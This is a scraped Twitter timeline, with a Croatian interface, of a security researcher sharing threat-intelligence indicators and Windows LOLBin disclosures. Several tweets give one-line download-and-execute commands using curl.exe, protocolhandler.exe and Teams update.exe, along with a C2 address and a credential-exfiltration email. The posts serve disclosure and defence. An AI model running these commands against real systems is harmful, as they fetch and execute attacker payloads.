Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @reegun21
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @reegun21
-
Prikvačeni tweet
#TA555 is back, Connects to 194.36.188[.]132 via Email campaign c2/[random].png - PS script c2/[random].jpg - PS script c2/[random].asp - encrypted c2/[random].asp - encrypted http://www.hexed.in/2020/02/ta555-campaign-feb-2020.html …#malware#APTHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Reegun proslijedio/la je Tweet
TeamViewer stored user passwords encrypted, not hashed, and the key is now publichttps://whynotsecurity.com/blog/teamviewer/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Reegun proslijedio/la je Tweet
SettingSyncHost.exe as a LolBin http://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/ …
#LOLBIN cd %TEMP% & c:\windows\system32\SettingSyncHost.exe -LoadAndRunDiagScript foopic.twitter.com/dOM4EHq4ZuHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
#Curl.exe is the new#rundll32.exe -#LOLbin Affected systems - Windows 10 build 17063 and Later curl -O http://192.168.191.1/shell191.exe & start shell191.exe More info - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 … https://youtu.be/f2xpCl2Y7t8#blueteam#redteam#dfir#ThreatHuntingPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
#Payload download via#Office Binary#protocolhandler.exe C:\[office installed folder]\root\[version]\ protocolhandler.exe "http://192.168.1.111/cmd.exe" https://youtu.be/eUTFeRwZxH0#lolbins#dfir#blueteam#redteam cc@Oddvarmoe@HexacornHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
#ExpressVPN#credential#leakage Fixed now. Found during house keeping my notebook,Thought of sharing to community.#privacyhttps://www.youtube.com/watch?v=2i-dUbDBpa0 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Reegun proslijedio/la je TweetPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
#Microsoft Office binaries#winword#excel#powerpnt added to#lolbas ||#lolbin https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/ … https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/ … https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/ … Writeup - https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 …#blueteam#redteam#dfir#infosec#pentest Thanks to@OddvarmoeHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Reegun proslijedio/la je Tweet
The following paths within %windir% are writable by any user. Now you know. Security descriptor auditing is valuable.pic.twitter.com/KzimubFcs6
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
I clarified some of the areas in the same writeup , You can find the latest update herehttps://medium.com/@reegun/microsoft-teams-exe-sideloading-aka-exe-proxying-part-1-b868d5459349 …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
#Microsoft#Teams | Exe Sideloading aka Exe proxying attack technique, Most of the#Nuget/#Squirrel applications affected, No need of installation. Medium : https://link.medium.com/Ug5hOf9LOZ Youtube : https://www.youtube.com/watch?v=3aZM0Rfjgy4 … Thanks to@Hexacorn ,@MrUn1k0d3r#blueteam#Redteam#dfirPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
#AgentTesla wave ,Stolen creds are sent to 'megauj@gmail.com' , The adversary was already covered by@malware_traffic https://twitter.com/malware_traffic/status/1095365891259289602 … 1F722BFF2471A5773A1A6724675AAE1Cpic.twitter.com/ENcsj7qa6F
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Unsanitized file validation leads to payload download via Office binaries, Using known feature we can execute the downloaded payload. Microsoft said , The behaviour was intentionally designed. Writeup : https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 … POC : https://youtu.be/yk3gKrgRVEE
#Blueteam#redteamPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Found another vulnerable parameter where Microsoft Teams do remote download and execute. Vulnerable parameter : update.exe --updateRollback=URL to package squirrel.exe --updateRollback=URL to package https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56 … CC:
@MrUn1k0d3r@Hexacorn@Oddvarmoe#blueteam#redteamHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Microsoft 'OneDrive' in %localappdata% with write access by default installation , Malware/Insiders can able to disguise the execution. Org's , push your installation to "C:\Program Files (x86)" Fix: OneDriveSetup.exe /allusers https://youtu.be/u58yu7eljqs
#blueteam#redteamHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.